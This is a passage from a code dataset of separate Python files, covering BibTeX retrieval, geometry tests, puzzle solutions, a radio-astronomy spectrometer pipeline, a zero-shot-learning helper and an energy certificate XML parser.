len(protocol_mix))\n\n\n\n\nmix_connection.close()\n\n","repo_name":"RafilxTenfen/master","sub_path":"Obelheiro/pesquisa/honeypot_data/mix-protocolos/create_table_mix_protocol.py","file_name":"create_table_mix_protocol.py","file_ext":"py","file_size_in_byte":8157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4588827268","text":"class BitrixException(Exception):\n\tdef __init__(self, error={}, message=None, *args, **kwargs):\n\t\tsuper().__init__(*args, **kwargs)\n\t\tself.error = error\n\t\tself.message = message\n\n\tdef __str__(self):\n\t\tif self.error:\n\t\t\treturn f\"{self.error}\"\n\t\tif self.message:\n\t\t\treturn f\"{self.message}\"","repo_name":"bzdvdn/aio_bitrix","sub_path":"aio_bitrix/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71623673512","text":"#!/usr/bin/env python\n\nimport sys\nimport warnings\nimport requests\nimport string\nfrom multiprocessing import Pool\n\n# Define base URL for querying the article database\nADS_URL = \"http://adsabs.harvard.edu/cgi-bin/nph-abs_connect\"\n\n# Define base URL for retrieving BibTeX entries\nBIB_URL = \"http://adsabs.harvard.edu/cgi-bin/nph-bib_query\"\n\n# Define custom return format for query\nformat = 'author=%za1,year=%Y,page=%p,bibcode=%R'\n\n\ndef fix_arxiv_entry(entry):\n if \"journal = {ArXiv Astrophysics e-prints}\" in entry:\n return\n else:\n entry_new = []\n for line in entry.split('\\n'):\n if 'eprint =' in line:\n continue\n else:\n entry_new.append(line)\n return '\\n'.join(entry_new)\n\ndef get_bibtex(bibcode):\n '''\n Retrieve the BibTeX abstract given by `bibcode`\n '''\n\n # Set query parameters\n parameters = {}\n parameters['bibcode'] = bibcode\n parameters['db_key'] = \"AST\"\n parameters['data_type'] = \"BIBTEX\"\n\n # Submit query\n entry = requests.get(BIB_URL, params=parameters).text\n\n # Find where the BibTeX starts\n p1 = entry.index('@')\n\n # Return the entry\n return 
entry[p1:]\n\n\ndef query_bibtex(author, year, page):\n '''\n Given an author, year, and page, return a BibTeX entry if a unique match\n is found. If no or multiple matches are found, returns None.\n '''\n\n # Set query parameters\n parameters = {}\n parameters['data_type'] = \"Custom\"\n parameters['format'] = format\n parameters['author'] = \"^%s\" % author\n parameters['start_year'] = year\n parameters['end_year'] = year\n parameters['db_key'] = \"AST\"\n parameters['jou_pick'] = \"NO\"\n\n # Submit query\n result = requests.get(ADS_URL, params=parameters).text\n\n # Initalize list of bibcodes\n bibcodes = []\n\n # Loop through results and only look at lines containing a result\n for line in result.splitlines():\n if 'bibcode=' in line:\n\n # Construct dictionary for this entry\n entry = {}\n for pair in line.split(','):\n key, value = pair.split('=')\n entry[key.strip()] = value.strip()\n\n # If this entry is a match (in terms of page number), keep it\n if 'page' in entry and entry['page'] == str(page):\n bibcodes.append(entry['bibcode'])\n\n # Check how many results were returned\n if len(bibcodes) == 0:\n\n warnings.warn(\"No article matches the author/year/page combination\")\n\n return ''\n\n elif len(bibcodes) == 1:\n\n # Retrieve the unique BibTeX entry\n entry = get_bibtex(bibcodes[0])\n\n # Change the citekey to author:year:page format\n entry = entry.replace(bibcodes[0], '%s:%s:%s' % (author, str(year)[2:], str(page)), 1)\n\n return entry\n\n else:\n\n warnings.warn(\"More than one article matches the author/year/page combination\")\n\n return ''\n\n\ndef citekey_to_bibtex(citekey):\n '''\n Given a citekey in the author:year:page format, return a unique BibTeX\n abstract. If no or multiple matches are found, or if the citekey does not\n conform to the author:year:page format, this function returns None\n '''\n\n try:\n\n author, year, page = citekey.strip().split(':')\n\n if int(year) > 20:\n year = 1900 + int(year)\n else:\n year = 2000 + int(year)\n\n return query_bibtex(author, year, page)\n\n except ValueError:\n\n return ''\n\ndef main(filename):\n\n # Initalize an empty list to contain all citekeys found in the paper\n all_citekeys = []\n\n # Check input file name\n if not filename.endswith('.tex'):\n raise Exception(\"Input filename should end in .tex\")\n\n # Open the input file\n text = open(filename, 'r').read().replace('\\n', ' ')\n\n # Extract all citekeys\n if \"\\cite\" in text:\n pos1 = -1\n while True:\n try:\n pos1 = text.index('\\cite', pos1 + 1)\n pos2 = text.index('{', pos1)\n pos3 = text.index('}', pos2)\n citekeys = text[pos2 + 1:pos3]\n all_citekeys += citekeys.split(',')\n except ValueError:\n break\n\n # Remove spaces before and after cite key\n all_citekeys = [citekey.strip() for citekey in all_citekeys]\n\n # Create unique list\n all_citekeys = list(set(all_citekeys))\n\n # Sort list alphabetically\n all_citekeys.sort()\n\n # Query all the citekeys. We use multiprocessing.Pool to submit many requests\n # at the same time. 
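[Editor's aside — the author:year:page citekey convention used by citekey_to_bibtex above, exercised standalone; the sample key is invented.]

def parse_citekey(citekey):
    author, year, page = citekey.strip().split(':')
    # two-digit years above 20 are treated as 19xx, the rest as 20xx
    year = 1900 + int(year) if int(year) > 20 else 2000 + int(year)
    return author, year, page

print(parse_citekey('smith:97:1123'))  # ('smith', 1997, '1123')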
I'm sure ADS loves me for this.\n p = Pool(processes=12)\n results = p.map(citekey_to_bibtex, all_citekeys)\n\n output = \"\"\n \n # Loop through results (same order as all_citekeys), and write out\n for ie, entry in enumerate(results):\n if entry != '':\n print(\"Retrieved entry for %s\" % all_citekeys[ie])\n entry = fix_arxiv_entry(entry) or '' # remove unnecessary arxiv fields (empty for pure arXiv e-prints)\n output += entry\n else:\n print(\"Searching failed for %s\" % all_citekeys[ie])\n\n # Create output file\n with open(filename.replace('.tex', '_auto.bib'), 'w') as f:\n f.write(output)\n\n return output\n\nif __name__ == \"__main__\":\n main(sys.argv[1])\n","repo_name":"astrofrog/auto_bibtex","sub_path":"auto_bibtex.py","file_name":"auto_bibtex.py","file_ext":"py","file_size_in_byte":5238,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"}
+{"seq_id":"18244267766","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 24 09:01:52 2023\n\n@author: a.babyak\n\"\"\"\n\nfrom CoordinateConversions import RadiansToXYZ, XYZToRadians\nfrom VectorCalculations import (ThreePointCircumcenter, Distance3D, DotProduct, \n ThreePointPlaneNormal, IntersectionWithSpheroid, \n VectorThrough, Midpoint, PerpendicularVector,\n LineIntersect, CenterPick)\nfrom ForTesting import VincentyInverse, ErrorTest\nfrom Center import ArcCenter\n\nError = 67.03192943708552\n\nP1 = RadiansToXYZ((-7.346357301466442e-07, 4.430217897370805))\nP2 = RadiansToXYZ((7.272502034539906e-07, 4.430217918292082))\nP3 = RadiansToXYZ((2.8622184163462365e-07, 4.430216938215158))\n\nprint(\"Points \\n\",P1,\"\\n\",P2,\"\\n\",P3,\"\\n\")\n\nPN = ThreePointPlaneNormal(P1, P2, P3)\nPN0 = PN[0],PN[1],0\n\nprint(\"Plane Normal \\n\",PN,\"\\n\",PN0,\"\\n\")\n\nM12 = Midpoint(P1, P2)\nM13 = Midpoint(P1, P3)\nM23 = Midpoint(P2, P3)\n\nprint(\"Midpoints\\n\",M12,\"\\n\",M13,\"\\n\",M23,\"\\n\")\n\nV12 = VectorThrough(P1, P2)\nV13 = VectorThrough(P1, P3)\nV23 = VectorThrough(P2, P3)\n\nprint(\"Vectors Through Points\\n\",V12,\"\\n\",V13,\"\\n\",V23,\"\\n\")\n\nP12 = PerpendicularVector(V12, PN)\nP13 = PerpendicularVector(V13, PN)\nP23 = PerpendicularVector(V23, PN)\n\nprint(\"Perpendicular Bisectors\\n\",P12,\"\\n\",P13,\"\\n\",P23)\n\nP120 = PerpendicularVector(V12, PN0)\nP130 = PerpendicularVector(V13, PN0)\nP230 = PerpendicularVector(V23, PN0)\n\nprint(\"\\n\",P120,\"\\n\",P130,\"\\n\",P230,\"\\n\")\n\nPotential1 = LineIntersect(M12, P12, M13, P13)\nPotential2 = LineIntersect(M12, P12, M23, P23)\nPotential3 = LineIntersect(M13, P13, M23, P23)\n\nprint(\"Potential Circumcenters\\n\",Potential1,\"\\n\",Potential2,\"\\n\",Potential3,\"\\n\")\n\nprint(\"Calculated Circumcenter\\n\",ThreePointCircumcenter(P1, P2, P3),\"\\n\")\n\nIS = IntersectionWithSpheroid(Potential2, PN)\nC = CenterPick(P1, P2, P3, IS)\nC0 = (-1775939.7,-6125901.55,0)\n\nprint(\"Center\\n\",C,\"\\n\",C0)\n\nAC = ArcCenter(P1, P2, P3, \"XYZ\")\nprint(\"\\n\",AC,\"\\n\")\n\nD1 = VincentyInverse(XYZToRadians(P1), XYZToRadians(C))\nD2 = VincentyInverse(XYZToRadians(P2), XYZToRadians(C))\nD3 = VincentyInverse(XYZToRadians(P3), XYZToRadians(C))\nprint(\"Distances\\n\",D1,D2,D3)\n\nE = ErrorTest(P1, P2, P3, AC, \"XYZ\")\nprint(E)\n\nCSharpCenter = (-1775937.741343743,-6125902.404211298,-0.017845721448131985)\nCSInt = IntersectionWithSpheroid(CSharpCenter, PN)\n","repo_name":"AllyBabyak/ellipsoidal-circumcenter","sub_path":"Final Python 
Code/Help.py","file_name":"Help.py","file_ext":"py","file_size_in_byte":2347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"30439939780","text":"class Solution(object):\r\n def findPeakElement(self, nums):\r\n \"\"\"\r\n :type nums: List[int]\r\n :rtype: int\r\n \"\"\"\r\n if len(nums) == 1:\r\n return 0\r\n left = 0\r\n right = len(nums)-1\r\n while(left < right):\r\n mid = (left + right)//2\r\n if nums[mid] > nums[mid+1]:\r\n right = mid\r\n else:\r\n left = mid+1\r\n return left\r\nif __name__== '__main__':\r\n nums = [1,2,3,4,1,5,6]\r\n solution = Solution()\r\n print(solution.findPeakElement(nums))","repo_name":"rorschach-xiao/leetcode","sub_path":"python/leetcode162.py","file_name":"leetcode162.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"40506161877","text":"from aoc.util.inputs import Input\n\n\nclass Y2015D8(object):\n def __init__(self, file_name):\n self.strings = Input(file_name).lines()\n\n def part1(self):\n result = 0\n\n for literal in self.strings:\n count = 0\n index = 1\n while index < len(literal) - 1:\n if literal[index] == '\\\\':\n if literal[index + 1] == 'x':\n index += 4\n else:\n index += 2\n else:\n index += 1\n\n count += 1\n\n result += len(literal) - count\n\n print(\"Part 1:\", result)\n\n def part2(self):\n result = 0\n\n for literal in self.strings:\n count = 2 # Start with the quotes on the ends\n index = 0\n while index < len(literal):\n if literal[index] == '\\\\':\n count += 2\n elif literal[index] == '\"':\n count += 2\n else:\n count += 1\n index += 1\n\n result += count - len(literal)\n\n print(\"Part 2:\", result)\n\n\nif __name__ == '__main__':\n code = Y2015D8(\"2015/8.txt\")\n code.part1()\n code.part2()\n","repo_name":"Jnesselr/AdventOfCode","sub_path":"aoc/y2015/d8.py","file_name":"d8.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
+{"seq_id":"3669990428","text":"from csv import DictReader\n\ndef _parse_response_data(response, format):\n\n if format not in ['csv', 'json']:\n raise ValueError('Format must be one of: csv, json')\n \n if format == 'json':\n return response.json()\n else:\n data = DictReader(response.text.splitlines())\n return list(data)","repo_name":"ebragas/parsehub-client","sub_path":"parsehub/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"13423470531","text":"import bifrost as bf\n\nimport bifrost.pipeline as bfp\nimport bifrost.blocks as blocks\nimport bifrost.views as views\nimport bifrost.guppi_raw as guppi_raw\nimport bifrost.sigproc as sigproc\nfrom bifrost.DataType import DataType\n\nfrom copy import deepcopy\n\ndef get_with_default(obj, key, default=None):\n\treturn obj[key] if key in obj else default\n\ndef mjd2unix(mjd):\n\treturn (mjd - 40587) * 86400\n\nclass GuppiRawSourceBlock(bfp.SourceBlock):\n def __init__(self, sourcenames, gulp_nframe=1, *args, **kwargs):\n super(GuppiRawSourceBlock, self).__init__(sourcenames,\n gulp_nframe=gulp_nframe,\n *args, **kwargs)\n self.always_return_0 = False\n def create_reader(self, sourcename):\n return open(sourcename, 'rb')\n def on_sequence(self, reader, sourcename):\n previous_pos = reader.tell()\n ihdr = guppi_raw.read_header(reader)\n header_size = reader.tell() - previous_pos\n self.header_buf = bytearray(header_size)\n nbit = 
ihdr['NBITS']\n assert(nbit in set([4,8,16,32,64]))\n nchan = ihdr['OBSNCHAN']\n bw_MHz = ihdr['OBSBW']\n cfreq_MHz = ihdr['OBSFREQ']\n df_MHz = bw_MHz / nchan\n f0_MHz = cfreq_MHz - 0.5*(nchan-1)*df_MHz\n # Note: This will be negative if OBSBW is negative, which is correct\n dt_s = 1. / df_MHz / 1e6\n # Derive the timestamp of this block\n byte_offset = ihdr['PKTIDX'] * ihdr['PKTSIZE']\n frame_nbyte = ihdr['BLOCSIZE'] / ihdr['NTIME']\n bytes_per_sec = frame_nbyte / dt_s\n offset_secs = byte_offset / bytes_per_sec\n tstart_mjd = ihdr['STT_IMJD'] + (ihdr['STT_SMJD'] + offset_secs) / 86400.\n tstart_unix = mjd2unix(tstart_mjd)\n ohdr = {\n '_tensor': {\n 'dtype': 'ci' + str(nbit),\n 'shape': [-1, nchan, ihdr['NTIME'], ihdr['NPOL']],\n # Note: 'time' (aka block) is the frame axis\n 'labels': ['time', 'channel', 'fine_time', 'pol'],\n 'scales': [(tstart_unix, abs(dt_s)*ihdr['NTIME']),\n (f0_MHz, df_MHz),\n (0, dt_s),\n None],\n 'units': ['s', 'MHz', 's', None]\n },\n 'az_start': get_with_default(ihdr, 'AZ'), # Decimal degrees\n 'za_start': get_with_default(ihdr, 'ZA'), # Decimal degrees\n 'raj': get_with_default(ihdr, 'RA')*(24./360.), # Decimal hours\n 'dej': get_with_default(ihdr, 'DEC'), # Decimal degrees\n 'source_name': get_with_default(ihdr, 'SRC_NAME'),\n 'refdm': get_with_default(ihdr, 'CHAN_DM'),\n 'refdm_units': 'pc cm^-3',\n 'telescope': get_with_default(ihdr, 'TELESCOP'),\n 'machine': get_with_default(ihdr, 'BACKEND'),\n 'rawdatafile': sourcename,\n 'coord_frame': 'topocentric',\n }\n # Note: This gives 32 bits to the fractional part of a second,\n # corresponding to ~0.233ns resolution. The whole part\n # gets at least 31 bits, which will overflow in 2038.\n time_tag = int(round(tstart_unix * 2**32))\n ohdr['time_tag'] = time_tag\n self.already_read_header = True\n \n ohdr['name'] = sourcename\n return [ohdr]\n def on_data(self, reader, ospans):\n if self.always_return_0:\n return [0]\n if not self.already_read_header:\n # Skip over header\n #ihdr = guppi_raw.read_header(reader)\n nbyte = reader.readinto(self.header_buf)\n if nbyte == 0:\n return [0] # EOF\n elif nbyte < len(self.header_buf):\n raise IOError(\"Block header is truncated\")\n self.already_read_header = False\n ospan = ospans[0]\n odata = ospan.data\n nbyte = reader.readinto(odata)\n if nbyte % ospan.frame_nbyte:\n #raise IOError(\"Block data is truncated\")\n reader.close()\n self.always_return_0 = True\n return [0]\n nframe = nbyte // ospan.frame_nbyte\n #print \"nframe:\", nframe\n #print \"nbyte:\", nbyte\n return [nframe]\n\ndef new_read_guppi_raw(filenames, *args, **kwargs):\n return GuppiRawSourceBlock(filenames, *args, **kwargs)\n\nclass GrabFirstBlock(bfp.TransformBlock):\n def __init__(self, iring, axis):\n \"\"\" Square the first element of an axis \"\"\"\n super(GrabFirstBlock, self).__init__(iring)\n self.specified_axis = axis\n def define_valid_input_spaces(self):\n \"\"\"Return set of valid spaces (or 'any') for each input\"\"\"\n return ('cuda',)\n def on_sequence(self, iseq):\n ihdr = iseq.header\n ohdr = deepcopy(ihdr)\n ohdr['_tensor']['shape'][3] = 1\n return ohdr\n def on_data(self, ispan, ospan):\n idata = ispan.data\n odata = ospan.data\n #print ospan.data.shape, ispan.data.shape\n bf.map(\n \"b(i, j, k, l) = a(i, j, k, l)\",\n ospan.data.shape,\n 'i', 'j', 'k', 'l',\n a=ispan.data,\n b=ospan.data)\n\ndef grab_first(iring, axis=0):\n return GrabFirstBlock(iring, axis)\n\n\nwith bfp.Pipeline() as pipeline:\n raw_guppi = new_read_guppi_raw(['blc1_guppi_57388_HIP113357_0010.0000.raw'], 
buffer_nframe=1)\n g_guppi = blocks.copy(raw_guppi, space='cuda', buffer_nframe=1)\n ffted = blocks.fft(g_guppi, axes='fine_time', axis_labels='freq', buffer_nframe=1)\n modulo = blocks.detect(ffted, mode='stokes', buffer_nframe=1)\n # Take I\n first_element = grab_first(modulo, 0)\n transposed = blocks.transpose(first_element, ['channel', 'time', 'pol', 'freq'])\n renamed = views.rename_axis(transposed, 'channel', 'beam')\n blocks.print_header(renamed)\n blocks.write_sigproc(renamed)\n pipeline.run()\n","repo_name":"MilesCranmer/bifrost_gpuspec","sub_path":"gpuspec.py","file_name":"gpuspec.py","file_ext":"py","file_size_in_byte":5947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1151332671","text":"import torch\r\nimport torch.nn as nn\r\nimport numpy as np\r\n\r\ndef MyLoss(config, gamma, *args):\r\n \"\"\"\r\n Aims to add the regularization loss to the initial loss.\r\n :param gamma: weight coefficient of the regularization term\r\n :param args: several phase parameter\r\n :return: weighted loss\r\n \"\"\"\r\n LaplaceConv = nn.Conv2d(in_channels=1, out_channels=1, kernel_size=(3, 3), stride=1, padding=0)\r\n LaplaceConv.weight.data = torch.tensor([[[[-1, -1, -1], [-1, 8, -1], [-1, -1, -1]]]], dtype=torch.float64)\r\n LaplaceConv.bias.data = torch.zeros(1, dtype=torch.float64)\r\n LaplaceConv.bias.requires_grad = False\r\n LaplaceConv.weight.requires_grad = False\r\n LaplaceConv = LaplaceConv.to(config.device)\r\n Fnorm_loss = 0\r\n for ii, phase in enumerate(args):\r\n phase = phase.unsqueeze(0)\r\n phase = phase.unsqueeze(0)\r\n phase_grad2 = LaplaceConv(phase)\r\n phase_Fnorm = torch.norm(phase_grad2) ** 2\r\n Fnorm_loss = Fnorm_loss + phase_Fnorm\r\n\r\n gamma_loss = gamma * Fnorm_loss\r\n return gamma_loss\r\n\r\n\r\n\r\ndef MyLabelLoss(config, input, target):\r\n \"\"\"\r\n :param config: configuration\r\n :param input: batch * 1 * 518 * 518\r\n :param target: batch tensor\r\n :return: batch_loss\r\n \"\"\"\r\n criterion = nn.MSELoss()\r\n label = np.zeros([10, config.CAM_pixel_num, config.CAM_pixel_num])\r\n for i in range(10):\r\n label[i] = np.load(\"../label/%d.npy\" % (i))\r\n\r\n label = torch.from_numpy(label).to(config.device)\r\n batch = input.size(0)\r\n batch_loss = 0\r\n for k in range(batch):\r\n target_num = target[k]\r\n label_img = label[target_num]\r\n input_img = input[k, 0]\r\n loss = criterion(input_img, label_img)\r\n batch_loss = batch_loss + loss\r\n\r\n return batch_loss\r\n\r\n\r\n\r\n\r\n#################################################### 验证卷积模块是否正确\r\nif __name__ == '__main__':\r\n import matplotlib.pyplot as plt\r\n import cv2\r\n from Config import get_config_from_json\r\n import numpy as np\r\n lenna = cv2.imread('./lenna.jpg', 0)\r\n laplacian = cv2.Laplacian(lenna, cv2.CV_64F)\r\n\r\n plt.figure('edge')\r\n plt.imshow(laplacian, cmap='gray')\r\n # plt.show()\r\n\r\n config_file = 'Configuration/SubBytesconfig.json'\r\n config = get_config_from_json(config_file)\r\n\r\n lenna = lenna.astype(np.float64)\r\n lenna_tensor = torch.from_numpy(lenna)\r\n myloss1 = MyLoss(config, 0, lenna_tensor)\r\n\r\n myloss1numpy = myloss1.numpy()[0, 0]\r\n\r\n plt.figure('myedge')\r\n plt.imshow(myloss1numpy, cmap='gray')\r\n # plt.show()\r\n\r\n a = laplacian[1:249, 1:249]\r\n delta = myloss1numpy + 
a","repo_name":"Lianhy0/DNN_MNIST_Complex","sub_path":"utils/RegularizationLoss.py","file_name":"RegularizationLoss.py","file_ext":"py","file_size_in_byte":2640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28265184981","text":"import numpy as np\nimport random\nimport torch\n\nclass SimilarSampleFinder:\n\t'''\n\tThe idea is to find the most similar class to the current one (later it could be more than one, but let's keep it simple for now),\n\tsample a feature vector from that class and use it to condition the GAN.\n\tThere are two parts to this:\n\t- Find the most similar seen class to the current one. This is done only once at the beginning.\n\t- Sample from the most similar seen class. This is done whenever we need to condition the GAN. This needs to be efficient.\n\t'''\n\n\tdef __init__(self, data):\n\t\t'''\n\t\tHere, we find the most similar seen classes for each class.\n\t\tWe simply define a matrix of labels, where each row corresponds to a class and each column corresponds to the index of a seen class sorted by similarity.\n\t\tThe similarity is measured as the distance between the signatures (no features are needed, only attributes).\n\t\t'''\n\t\tself.data = data\n\t\tself.n_classes = data.get_n_classes()\n\t\t# create a two-dimensional array of size n_classes x n_seen_classes, where each element is the index of a seen class sorted by similarity\n\t\tsimilarities = np.zeros((self.n_classes, len(data.seen_classes)))\n\t\t# for each class...\n\t\tfor i in range(self.n_classes):\n\t\t\t# get the class signature\n\t\t\tsignature = data.attributes[i]\n\t\t\t# now we need to compare this signature to all the signatures of the seen classes (excluding the current one)\n\t\t\t# we can do this by simply subtracting the current signature from all the signatures of the seen classes\n\t\t\t# and then finding the norms and sorting them\n\t\t\tnorms = []\n\t\t\tindexes = []\n\t\t\tfor j in data.seen_classes:\n\t\t\t\tif j == i:\n\t\t\t\t\t# we can't use the same class as the most similar one, so we set the norm to infinity\n\t\t\t\t\tcomparison_norm = np.inf\n\t\t\t\telse:\n\t\t\t\t\tother_signature = data.attributes[j]\n\t\t\t\t\tcomparison = signature - other_signature\n\t\t\t\t\tcomparison_norm = np.linalg.norm(comparison)\n\t\t\t\tindexes.append(j)\n\t\t\t\tnorms.append(comparison_norm)\n\t\t\t# sort the norms and indexes in ascending order\n\t\t\tsorted_norms, sorted_indexes = zip(*sorted(zip(norms, indexes)))\n\t\t\t# store the sorted indexes in the similarities matrix\n\t\t\tsimilarities[i] = sorted_indexes\n\t\tself.similarities = similarities\n\t\tprint(similarities)\n\n\tdef get_sample(self, label, n_features, cond_size, k=1, agg_type='concat', pool_type='mean'):\n\t\t'''\n\t\tGiven a label, a number of similar classes to use (default 1), and the type of aggregation (concat or mean) and pooling (mean, max, or first),\n\t\treturns a feature vector from the most similar seen class or a fused feature vector from the most similar seen classes.\n\t\t'''\n\t\t# let's make the lenght of every feature vector equal cond_size\n\t\tpooling_size = n_features // cond_size\n\t\t# get the k most similar seen classes\n\t\tsimilar_labels = self.similarities[label][:k] # use the first k columns of the similarities matrix\n\t\t# initialize an empty list of feature vectors\n\t\tfeature_vectors = []\n\t\t# loop over the k most similar seen classes\n\t\tfor similar_label in similar_labels:\n\t\t\t# get the locations of the occurrencies of 
the label provided as input\n\t\t\tlocations = np.where(self.data.train_Y == similar_label)[0]\n\t\t\t# from these locations, we need to sample a random one\n\t\t\tlocation = random.choice(locations)\n\t\t\t# now get the feature vector at that location\n\t\t\tfeature_vector = self.data.train_X[location]\n\t\t\t# apply pooling to reduce dimensionality\n\t\t\tfeature_vector = feature_vector.view(-1, pooling_size)\n\t\t\tif pool_type == 'mean':\n\t\t\t\tfeature_vector = torch.mean(feature_vector, dim=1)\n\t\t\telif pool_type == 'max':\n\t\t\t\tfeature_vector = torch.max(feature_vector, dim=1).values\n\t\t\telif pool_type == 'first':\n\t\t\t\tfeature_vector = feature_vector[:, 0]\n\t\t\t#elif pool_type == 'linear':\n\t\t\t#\tfeature_vector = torch.nn.Linear(len(feature_vector), len(feature_vector) , bias=False)\n\t\t\telse:\n\t\t\t\traise ValueError('Invalid pooling type')\n\t\t\t# append the feature vector to the list\n\t\t\tfeature_vectors.append(feature_vector)\n\t\t# check the flag for feature fusion\n\t\tif agg_type == 'concat':\n\t\t\t# stack the feature vectors along the dimension 0\n\t\t\tfeature_vector = torch.stack(feature_vectors, dim=0)\n\t\t\t# flatten the feature vector\n\t\t\tfeature_vector = feature_vector.flatten()\n\t\telif agg_type == 'mean':\n\t\t\t# average the feature vectors along the dimension 0\n\t\t\tfeature_vector = torch.mean(torch.stack(feature_vectors, dim=0), dim=0)\n\t\telse:\n\t\t\traise ValueError('Invalid aggregation type.')\n\t\t# stack a noise vector to the feature vector\n\t\tnoise = torch.randn(cond_size)\n\t\tfeature_vector = torch.cat((feature_vector, noise), 0)\n\t\treturn feature_vector\n\n\tdef get_samples(self, labels, n_features, cond_size, k=1, agg_type='concat', pool_type='mean'):\n\t\t'''\n\t\tGiven a batch of labels, returns a batch of features from the most similar seen classes.\n\t\t'''\n\t\t# call the get_sample function for each label (make it an array of Tensors)\n\t\treturn torch.stack([self.get_sample(label, n_features, cond_size, k, agg_type, pool_type) for label in labels])\n","repo_name":"alesimattia/Prog_DeepL-ZeroShotLearning-analogy-based","sub_path":"modules/similar_sample_finder.py","file_name":"similar_sample_finder.py","file_ext":"py","file_size_in_byte":4974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1906598682","text":"#!/usr/bin/env python\n# encoding: utf8\n\n\"\"\"Definición de entidades para el análisis de informes de resultados en XML\"\"\"\n\nimport os\nfrom collections import OrderedDict\nimport base64\n\nimport numbers\nimport lxml.etree\nfrom lxml.html.clean import clean_html\nfrom pygments import highlight\nfrom pygments.lexers.html import XmlLexer\nfrom pygments.formatters import HtmlFormatter\nfrom .imgb64 import base64check\n\nXSDPATH2 = os.path.join(\n os.path.dirname(__file__),\n 'static/validador/DatosEnergeticosDelEdificioSchema20.xsd')\nXSDPATH1 = os.path.join(\n os.path.dirname(__file__),\n 'static/validador/DatosEnergeticosDelEdificioSchema10.xsd')\n\nVECTORES = ('GasNatural GasoleoC GLP Carbon BiomasaPellet BiomasaOtros '\n 'ElectricidadPeninsular ElectricidadBaleares '\n 'ElectricidadCanarias ElectricidadCeutayMelilla Biocarburante').split()\nSERVICIOS = ('Global Calefaccion Refrigeracion ACS Iluminacion').split()\nNIVELESESCALA = 'A B C D E F'.split()\nALERTINT = 9999999999\nALERTFLOAT = ALERTINT + 0.99\nALERT = ALERTINT / 100\n\nclass Bunch(OrderedDict):\n \"Contenedor genérico\"\n def __init__(self, *args, **kwds):\n 
OrderedDict.__init__(self, *args, **kwds)\n def __str__(self):\n state = [u\"%s=%s\" % (attribute, value)\n for (attribute, value) in self.__dict__.items()\n if not attribute.startswith('_OrderedDict')]\n return u'\\n'.join(state)\n __unicode__ = __str__\n\nXMLPARSER = lxml.etree.XMLParser(resolve_entities=False, # no sustituye unicode a entidades\n remove_blank_text=True,\n ns_clean=True, # limpia namespaces\n remove_comments=True)\ndef astext(tree, path):\n element = tree.find(path)\n if element is None or not element.text:\n return '-'\n txt = element.text\n if txt and txt.startswith('data:text/html,'):\n txt = txt.lstrip('data:text/html,').strip()\n txt = clean_html(txt) if txt else ''\n return txt\n\ndef asint(tree, path):\n element = tree.find(path)\n if element is None or not element.text:\n return None\n try:\n val = int(element.text)\n except ValueError:\n val = ALERTINT\n return val\n\ndef asfloat(tree, path):\n element = tree.find(path)\n if element is None or not element.text:\n return None\n try:\n val = float(element.text)\n except ValueError:\n val = ALERTFLOAT\n return val\n\n\nclass InformeXML(object):\n def __init__(self, xmldata):\n self.xml = xmldata\n self._xmltree = None\n self._data = None\n self.xmlschema = None\n self._parsetree()\n\n @property\n def xmltree(self):\n \"\"\"Árbol lxml de entidades XML\"\"\"\n if self._xmltree is None:\n self._xmltree = lxml.etree.XML(self.xml,\n parser=XMLPARSER)\n return self._xmltree\n\n @property\n def version(self):\n \"\"\"Version del esquema usado en el informe XML\"\"\"\n return self.xmltree.get('version')\n\n @property\n def data(self):\n \"\"\"Objeto etree correspondiente al informe XML\"\"\"\n if self._data is None:\n self._data = self._parsetree()\n return self._data\n\n @property\n def astext(self):\n \"\"\"Contenido del informe como texto\"\"\"\n SECTIONS = ('DatosDelCertificador', 'IdentificacionEdificio',\n 'DatosGeneralesyGeometria', 'DatosEnvolventeTermica',\n 'InstalacionesTermicas', 'InstalacionesIluminacion', #Es lista\n 'Demanda', 'Consumo', 'CondicionesFuncionamientoyOcupacion', # Es lista\n 'EmisionesCO2', 'Calificacion', 'MedidasDeMejora')\n data = [self.version,]\n for section in SECTIONS:\n data.append(u'%s\\n' % section +\n u'=' * len(section) +\n u'\\n' + unicode(getattr(self.data, section)) +\n u\"\\n\")\n data.append(u'Potenciamediailum\\n===========\\n' +\n str(self.data.InstalacionesIluminacion.totalpotenciamedia) +\n u\"\\n\")\n return '\\n'.join(data)\n\n @property\n def ashtml(self):\n \"\"\"Contenido del informe como HTML resaltado\"\"\"\n return highlight(self.xml,\n XmlLexer(),\n HtmlFormatter(noclasses=True))\n\n def _parsetree(self):\n et = self.xmltree\n data = Bunch()\n\n ## Datos del certificador\n bb = Bunch()\n data.DatosDelCertificador = bb\n for attr in ['NombreyApellidos', 'NIF', 'RazonSocial', 'NIFEntidad', 'Domicilio',\n 'Municipio', 'CodigoPostal', 'Provincia', 'ComunidadAutonoma',\n 'Email', 'Telefono', 'Titulacion', 'Fecha']:\n setattr(bb, attr, astext(et, './DatosDelCertificador/%s' % attr))\n #print bb\n\n ## Identificación del edificio\n bb = Bunch()\n data.IdentificacionEdificio = bb\n for attr in ['NombreDelEdificio', 'Direccion',\n 'Municipio', 'CodigoPostal', 'Provincia', 'ComunidadAutonoma',\n 'ZonaClimatica', 'AnoConstruccion', 'ReferenciaCatastral',\n 'TipoDeEdificio', 'NormativaVigente', 'Procedimiento',\n 'AlcanceInformacionXML']:\n setattr(bb, attr, astext(et, 